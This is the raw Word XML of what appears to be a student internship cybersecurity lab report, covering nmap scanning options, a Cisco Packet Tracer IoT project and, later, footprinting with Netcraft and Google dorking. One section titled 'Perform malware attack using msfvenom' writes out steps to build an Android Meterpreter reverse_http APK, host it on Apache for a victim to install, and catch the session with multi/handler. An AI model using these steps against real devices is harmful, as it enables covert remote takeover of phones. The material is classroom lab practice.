            <wp:docPr id="25" name="Picture 25" descr="E:\Amit Internship\htt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Amit Internship\http\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AE1B" w14:textId="1B17CB95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1FEF1738" w14:textId="179F04C5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</w:p>
    <w:p w14:paraId="4A86B1D6" w14:textId="2C614865" w:rsidR="008955CF" w:rsidRDefault="008955CF" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7CC826" w14:textId="21A2B4D0" w:rsidR="008955CF" w:rsidRPr="00244EB6" w:rsidRDefault="008955CF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5. Perform Network scanning using following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commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2FACFE" w14:textId="77777777" w:rsidR="008955CF" w:rsidRPr="00244EB6" w:rsidRDefault="008955CF" w:rsidP="008955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STEP 1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814A222" w14:textId="3961275B" w:rsidR="008955CF" w:rsidRPr="00EA33BC" w:rsidRDefault="008955CF" w:rsidP="008955CF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B0DEA27" w14:textId="2E0442A1" w:rsidR="008955CF" w:rsidRDefault="00D103D7" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D103D7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BFACBFA" wp14:editId="5F325641">
            <wp:extent cx="5731510" cy="3223974"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="26" name="Picture 26" descr="E:\Amit Internship\co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Amit Internship\com\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48CE" w14:textId="3C19F04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p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38178D50" w14:textId="77777777" w:rsidR="008955CF" w:rsidRDefault="008955CF" w:rsidP="008955CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="770"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A23AD42" w14:textId="573C58C9" w:rsidR="008955CF" w:rsidRPr="008955CF" w:rsidRDefault="00E6008F" w:rsidP="00E6008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="770"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6008F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4139F272" wp14:editId="7A26D2E4">
            <wp:extent cx="5843050" cy="1842135"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="27" name="Picture 27" descr="C:\Users\user\Pictures\nmap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nmap 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47" cy="18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51FF" w14:textId="3A168D64" w:rsidR="008955CF" w:rsidRDefault="008955CF" w:rsidP="008955CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3B0AD3" w14:textId="18B9E39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sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B420CF1" w14:textId="77777777" w:rsidR="008955CF" w:rsidRDefault="008955CF" w:rsidP="008955CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="770"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5CCBEF" w14:textId="33571893" w:rsidR="008955CF" w:rsidRPr="008955CF" w:rsidRDefault="007B377D" w:rsidP="008955CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="770"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B377D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48F961D2" wp14:editId="71D44D57">
            <wp:extent cx="5731510" cy="3226438"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="28" name="Picture 28" descr="E:\Amit Internship\com\p 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Amit Internship\com\p sv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4B1A" w14:textId="4CC8BBC7" w:rsidR="00F860EF" w:rsidRDefault="00F860E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BD89B35" w14:textId="4FC718E5" w:rsidR="008955CF" w:rsidRDefault="008955C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2412DE76" w14:textId="2E6E9C2E" w:rsidR="008955CF" w:rsidRPr="00244EB6" w:rsidRDefault="008955CF" w:rsidP="008955C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sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="531ACEB8" w14:textId="172C6AC9" w:rsidR="002E272C" w:rsidRDefault="00A93FF2" w:rsidP="00EB2C2D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:ind w:left="770"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A93FF2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43D8A45F" wp14:editId="488B10F6">
            <wp:extent cx="5556085" cy="3226171"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="29" name="Picture 29" descr="E:\Amit Internship\com\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Amit Internship\com\s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71" cy="32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66E0" w14:textId="6CDABB57" w:rsidR="008955CF" w:rsidRDefault="008955C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6759C6D" w14:textId="495D1BA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3F9F996" w14:textId="1A2A4388" w:rsidR="002E272C" w:rsidRPr="00244EB6" w:rsidRDefault="002E272C" w:rsidP="002E272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O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4408AF7E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626D6523" w14:textId="0D2AB0F2" w:rsidR="002E272C" w:rsidRPr="002E272C" w:rsidRDefault="008E1AEB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 w:rsidRPr="008E1AEB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30799EF0" wp14:editId="5333D7A2">
            <wp:extent cx="5731510" cy="3226438"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="30" name="Picture 30" descr="E:\Amit Internship\com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Amit Internship\com\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7F9B" w14:textId="70288301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A4DA9E3" w14:textId="511A831A" w:rsid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01246400" w14:textId="77777777" w:rsid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5D36AA15" w14:textId="7E07622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A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17258F43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226C55CD" w14:textId="5D5178AC" w:rsidR="002E272C" w:rsidRPr="002E272C" w:rsidRDefault="00AF3B9F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 w:rsidRPr="00AF3B9F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254E8C8D" wp14:editId="36B31F9D">
            <wp:extent cx="5731510" cy="3226438"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="31" name="Picture 31" descr="E:\Amit Internship\com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mit Internship\com\a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BD9" w14:textId="4F23C4A7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19D79EC1" w14:textId="186FE136" w:rsidR="002E272C" w:rsidRDefault="00AF3B9F" w:rsidP="008955CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:ind w:left="770"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3B9F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65D4F1AA" wp14:editId="7B895082">
            <wp:extent cx="5731510" cy="3226438"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="32" name="Picture 32" descr="E:\Amit Internship\com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mit Internship\com\a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E32F" w14:textId="6FD37801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0767CE82" w14:textId="346A029B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6E5C089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61F2C2AF" w14:textId="3B490BD1" w:rsidR="002E272C" w:rsidRDefault="00AF3B9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 w:rsidRPr="00AF3B9F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4ED5E105" wp14:editId="1918BEC3">
            <wp:extent cx="5731510" cy="3226438"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="33" name="Picture 33" descr="E:\Amit Internship\com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mit Internship\com\a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CED1" w14:textId="655AEB32" w:rsidR="002E272C" w:rsidRPr="00AF3B9F" w:rsidRDefault="002E272C" w:rsidP="00AF3B9F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D7522EE" w14:textId="4D279C9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3AE7C29" w14:textId="73AAD80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–Pt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B482B25" w14:textId="77777777" w:rsidR="002E272C" w:rsidRDefault="002E272C" w:rsidP="002E272C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2E188C" w14:textId="7B474786" w:rsidR="002E272C" w:rsidRDefault="00AF3B9F" w:rsidP="002E272C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3B9F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66BF1F99" wp14:editId="1E92083E">
            <wp:extent cx="5731510" cy="3226438"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="34" name="Picture 34" descr="E:\Amit Internship\com\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mit Internship\com\p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F271" w14:textId="46B4A60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B51855A" w14:textId="21759361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6A3C73B" w14:textId="441EF7DA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2FA5D27" w14:textId="2E7A1052" w:rsidR="002E272C" w:rsidRPr="00244EB6" w:rsidRDefault="002E272C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6. Networking project on Fire extinguisher using cisco packet tracer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0E612" w14:textId="16470D1F" w:rsidR="002E272C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52DA6D2C" w14:textId="209B1CBC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, we ope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Cisco Packet Tracer Software</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then in the file we choose the components as shown below and connect i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D69A32F" w14:textId="357BF5CE" w:rsidR="006C722D" w:rsidRPr="006C722D" w:rsidRDefault="006C722D" w:rsidP="002E272C">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C722D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175D11D2" wp14:editId="3F7BDA11">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="47" name="Picture 47" descr="E:\Amit Internship\Cisco Packet tracer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mit Internship\Cisco Packet tracer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C3DD" w14:textId="0E0AC35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4DF481A6" w14:textId="146D3F98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To connect it wireless, click o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 xml:space="preserve">, go for the wireless option and select SSID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Gateway1</w:t>
      </w:r>
      <w:r w:rsidRPr="003013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1096987E" w14:textId="2A626B41" w:rsidR="00436723" w:rsidRDefault="006C722D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6C722D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308DBD74" wp14:editId="735FCE9C">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="49" name="Picture 49" descr="E:\Amit Internship\Cisco Packet tracer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mit Internship\Cisco Packet tracer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8AFE" w14:textId="1073A01F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3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED26CF9" w14:textId="148E53F9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Now open the siren, click advance and go to I/O configuration and  change network adapter as wireless i.e.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T-IOT-NM-1W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o to configuration and then  select interface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0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ateway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DHCP</w:t>
      </w:r>
      <w:r w:rsidR="00097CB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS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Automatic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3013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>IoT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003013E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> server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>. Repeat same steps for the other components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E03169" w14:textId="2F41E395" w:rsidR="00436723" w:rsidRDefault="006C722D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6C722D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794AC2E2" wp14:editId="54EE6C5A">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="50" name="Picture 50" descr="E:\Amit Internship\Cisco Packet tracer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mit Internship\Cisco Packet tracer\Screenshot (2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C50" w14:textId="0E363564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4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AB0569" w14:textId="7693437E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xt we want to check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I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nitor in the smartphone. We see all the components and they are in off condition. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E548F" w14:textId="171692F0" w:rsidR="00436723" w:rsidRDefault="006C722D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6C722D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1A46C683" wp14:editId="40C49B25">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="51" name="Picture 51" descr="E:\Amit Internship\Cisco Packet tracer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mit Internship\Cisco Packet tracer\Screenshot (24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82AE" w14:textId="734C634D" w:rsidR="00436723" w:rsidRDefault="006C722D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6C722D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13075BB3" wp14:editId="26FD7D48">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="52" name="Picture 52" descr="E:\Amit Internship\Cisco Packet tracer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mit Internship\Cisco Packet tracer\Screenshot (25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754B" w14:textId="1FE01262" w:rsidR="00436723" w:rsidRDefault="006C722D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6C722D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0BEAD8A3" wp14:editId="674CF605">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="53" name="Picture 53" descr="E:\Amit Internship\Cisco Packet tracer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mit Internship\Cisco Packet tracer\Screenshot (27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3CD" w14:textId="0A91242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5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D248484" w14:textId="5135F8C4" w:rsidR="003013E9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 xml:space="preserve">From there we click on the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B52C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>condition  and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B52C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can give actions of the on and off of the home appliances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E001B33" w14:textId="31598E78" w:rsidR="00436723" w:rsidRDefault="006C722D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6C722D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21AB96FD" wp14:editId="4E6CB058">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="54" name="Picture 54" descr="E:\Amit Internship\Cisco Packet tracer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mit Internship\Cisco Packet tracer\Screenshot (29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846" w14:textId="375F2C0E" w:rsidR="00EC5CC6" w:rsidRDefault="006C722D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6C722D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2CB7F381" wp14:editId="5A5D170F">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="55" name="Picture 55" descr="E:\Amit Internship\Cisco Packet tracer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mit Internship\Cisco Packet tracer\Screenshot (30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32F1B0E" w14:textId="70DD269A" w:rsidR="00EC5CC6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 xml:space="preserve">We can see the output in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B52C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B52C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in the git file along with this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1ECC6A" w14:textId="77777777" w:rsidR="003013E9" w:rsidRDefault="003013E9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EB5897A" w14:textId="15732E21" w:rsidR="00EC5CC6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EBD5744" w14:textId="40C9C8A5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8234A9E" w14:textId="1CF25FB9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94F0B42" w14:textId="086FAEA8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F8C280A" w14:textId="7EE8ECA2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C0CCA1B" w14:textId="67B1958A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G</w:t>
      </w:r>
      <w:r w:rsidR="007523A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ROUP 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00244EB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8CAFD5C" w14:textId="5899DA36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1.Perform</w:t>
      </w:r>
      <w:proofErr w:type="gram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malware attack using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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2155222F" w14:textId="6F45C533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764A4EF4" w14:textId="5425FADB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 we access the root by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and. Then we enter the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and. We will be attacking </w:t>
      </w:r>
      <w:proofErr w:type="spell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roid device so our next command will be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-p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lastRenderedPageBreak/>
        <w:t>android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00097CB4" w:rsidRPr="00EA5507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terpreter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reverse_http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LHOST= LPORT=443 R &gt;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attack.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B17CF82" w14:textId="1D9576C6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n the next command is copying the file in the html site by the command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cp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attack.apk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var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>/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA55D6" w14:textId="551C91E0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that we star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pache2 serv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ED7D83" w14:textId="77777777" w:rsidR="00B52C16" w:rsidRDefault="00B52C16" w:rsidP="00B52C16">
      <w:pPr>
        <w:spacing w:before="240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After this we will go to the websit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ip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address of kali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linux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>”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attack.ap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we will download the file and install it in your android device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD8DC6B" w14:textId="6D3D33EC" w:rsidR="008072B3" w:rsidRDefault="00013752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013752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401425E5" wp14:editId="13AB0C12">
            <wp:extent cx="5731510" cy="3113806"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="35" name="Picture 35" descr="E:\Amit Internship\msfveno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mit Internship\msfvenom\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F4E9" w14:textId="10CB895B" w:rsidR="008072B3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013752" w:rsidRPr="00013752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1CB2CF15" wp14:editId="6A7E77EC">
            <wp:extent cx="5661025" cy="1447165"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="36" name="Picture 36" descr="E:\Amit Internship\msfveno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mit Internship\msfvenom\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59718E30" w14:textId="7E204360" w:rsidR="00013752" w:rsidRDefault="00013752" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74689DC1" w14:textId="22140546" w:rsidR="00013752" w:rsidRDefault="00ED7509" w:rsidP="008072B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13752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751B1828" wp14:editId="400043DD">
            <wp:extent cx="4898835" cy="8965870"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="37" name="Picture 37" descr="E:\Amit Internship\msfvenom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mit Internship\msfvenom\3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35" cy="89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EB51" w14:textId="0772C80F" w:rsidR="00B52C16" w:rsidRPr="008072B3" w:rsidRDefault="008072B3" w:rsidP="008072B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8072B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Here we can see</w:t>
      </w:r>
      <w:r w:rsidR="00013752">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00013752">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>MainActivity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00013752">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> app installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47237EC3" w14:textId="62DF907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AD1A775" w14:textId="1E071BC0" w:rsidR="00EC5CC6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we enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>msfconso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Then we run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xploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">. We set the payload by the command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set payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since it is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ndroid device it will b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ndroid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meterpreter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reverse_htt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After we see the options we have to se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RHOSTS, LPORT </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5507">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>and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LHOS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1C053FE" w14:textId="07082F45" w:rsid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this we run and the android device is exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CE68BD" w14:textId="77777777" w:rsidR="008072B3" w:rsidRDefault="008072B3" w:rsidP="002E272C">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F0C419" w14:textId="1329A9CF" w:rsidR="008072B3" w:rsidRDefault="00054E31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4E31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7979F61A" wp14:editId="03C3C1BC">
            <wp:extent cx="5731510" cy="3225653"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="38" name="Picture 38" descr="E:\Amit Internship\msfvenom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mit Internship\msfvenom\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4CFD" w14:textId="77777777" w:rsidR="008072B3" w:rsidRDefault="008072B3" w:rsidP="002E272C">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E869170" w14:textId="213BB712" w:rsidR="008072B3" w:rsidRPr="008072B3" w:rsidRDefault="00E24F95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E24F95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17BF47BB" wp14:editId="243DD777">
            <wp:extent cx="5731510" cy="3887811"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="39" name="Picture 39" descr="E:\Amit Internship\msfvenom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mit Internship\msfvenom\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51DC" w14:textId="77777777" w:rsidR="00EA5507" w:rsidRDefault="00EA5507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5580A99" w14:textId="42D70F2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2. Perform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footprinting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and reconnaissance using following websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3FFBFE" w14:textId="6B28A86F" w:rsidR="00EC5CC6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a)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etkraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="144A6D77" w14:textId="4D2B2F3F" w:rsidR="00CE2612" w:rsidRDefault="00445476" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445476">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C84A959" wp14:editId="14DFE446">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="40" name="Picture 40" descr="E:\Amit Internship\netkrafting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mit Internship\netkrafting\Screenshot (12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2872" w14:textId="76BB1CF1" w:rsidR="00CE2612" w:rsidRDefault="00445476" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445476">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EA21A39" wp14:editId="6A6B701E">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="41" name="Picture 41" descr="E:\Amit Internship\netkrafting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mit Internship\netkrafting\Screenshot (13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5B1E" w14:textId="77777777" w:rsidR="00CE2612" w:rsidRDefault="00CE2612" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366AF6EE" w14:textId="6A4EB1E1" w:rsidR="00CE2612" w:rsidRDefault="00445476" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445476">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="131270D5" wp14:editId="0758C74D">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="42" name="Picture 42" descr="E:\Amit Internship\netkrafting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mit Internship\netkrafting\Screenshot (14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BDF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D29DDE" w14:textId="042A5461" w:rsidR="008072B3" w:rsidRPr="00244EB6" w:rsidRDefault="00CE2612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b) Google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dorking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A0B1B58" w14:textId="4EF84E9F" w:rsidR="00495340" w:rsidRDefault="0073365E" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073365E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
